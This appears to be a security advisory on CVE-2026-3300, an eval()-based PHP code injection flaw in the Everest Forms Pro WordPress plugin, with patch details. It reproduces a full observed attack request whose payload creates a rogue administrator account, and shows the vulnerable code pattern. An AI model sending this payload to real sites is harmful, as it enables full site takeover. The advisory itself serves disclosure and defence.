A critical vulnerability has recently been discovered in the WordPress plugin Everest Forms Pro, a tool used by approximately 4,000 active sites to create and manage advanced forms. Identified as CVE-2026-3300, this security flaw perfectly illustrates how a design error in user data handling can lead to a complete compromise of a website.
Rated 9.8 out of 10 on the CVSS scale, this vulnerability allows an unauthenticated attacker to execute arbitrary PHP code remotely, opening the door to full server takeover.
A critical vulnerability in the plugin’s calculation engine
The issue lies in the “Complex Calculation” feature used by Everest Forms Pro to perform dynamic calculations based on data submitted in a form.
To execute these calculations, the plugin uses the PHP function: eval()
This function is very dangerous because it executes PHP code in text form.
The problem is that data sent by the user is directly inserted into the PHP code before being passed to eval().
In simple terms:
$code = "$FIELD_1 = '$user_input'";
eval($code);If a malicious user sends:
'; malicious_code(); //The code becomes:
$FIELD_1 = '';
malicious_code();
//';and PHP then executes the attacker’s code.
The plugin uses sanitize_text_field(), but this function sanitizes certain characters but does not escape apostrophes (‘) used in PHP code. Researchers discovered that an attacker could break out of the string and then inject their own PHP code. This is called PHP Code Injection, which then leads to Remote Code Execution (RCE).
Observed attack example
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
everest_forms[id]=2909&everest_forms[form_fields][svbtwqPN9R-2]=';if(!username_exists('diksimarina')){wp_insert_user(array('user_login'=>'diksimarina','user_pass'=>'[redacted]','user_email'=>'diksimarina@gmail.com','role'=>'administrator'));echo 'ADMINCREATED';}else{echo 'ADMINEXISTS';} //&everest_forms[form_fields][eluWudCcdM-1]=test&everest_forms[form_fields][email]=test&everest_forms[form_fields][rVuWSql19Q-3]=test&everest_forms[form_fields][rwkAbDLqrq-7]=test&everest_forms[form_fields][LKLn7arQDU-5]=test&action=everest_forms_ajax_form_submission&security=cd840335ffThis attack request example illustrates a real exploitation of the CVE-2026-3300 vulnerability in the Everest Forms Pro plugin, where an attacker abuses WordPress form processing to execute arbitrary PHP code. The attack begins with a POST request sent to the legitimate endpoint /wp-admin/admin-ajax.php, used by WordPress to handle AJAX form submissions. This allows the attacker to hide their activity within normal traffic that is difficult to distinguish from a legitimate user request.
The core of the attack is located in a specific form field (everest_forms[form_fields][svbtwqPN9R-2]) where the attacker injects a malicious payload. This value starts with a simple apostrophe followed by a semicolon, which allows closing the PHP string in which the value will be inserted by the plugin. Once this syntactic barrier is broken, the attacker directly injects PHP code, including calls to username_exists() and wp_insert_user(), in order to verify whether a user exists and then create a new WordPress account with administrator privileges. In this example, the created account is named “diksimarina” and is configured with the administrator role, giving full access to the compromised site.
The end of the payload contains a comment marker //, which is crucial because it allows the rest of the code automatically generated by the plugin to be ignored, preventing PHP syntax errors and ensuring smooth execution of the injection. The other form fields contain normal values to simulate a legitimate submission and reduce suspicion.
Once the request is processed by the plugin and passed through the vulnerable calculation engine, the injected code is executed via eval(), turning a simple form submission into code execution on the server.
Patch and affected versions
The vulnerability affects all versions of Everest Forms Pro up to and including version 1.9.12. The patch was released in version 1.9.13, which prevents code injection and fixes how user data is processed before evaluation.
Users are therefore strongly encouraged to update their installations immediately to avoid active exploitation.
Conclusion: a high-impact critical RCE vulnerability
CVE-2026-3300 once again demonstrates that Remote Code Execution vulnerabilities remain among the most dangerous in the WordPress ecosystem. By combining improper user input handling with the use of dangerous functions such as eval(), a simple calculation feature becomes a gateway to full system compromise.
With active exploitation already occurring and thousands of blocked attempts, this flaw should be considered a critical priority for all administrators using Everest Forms Pro.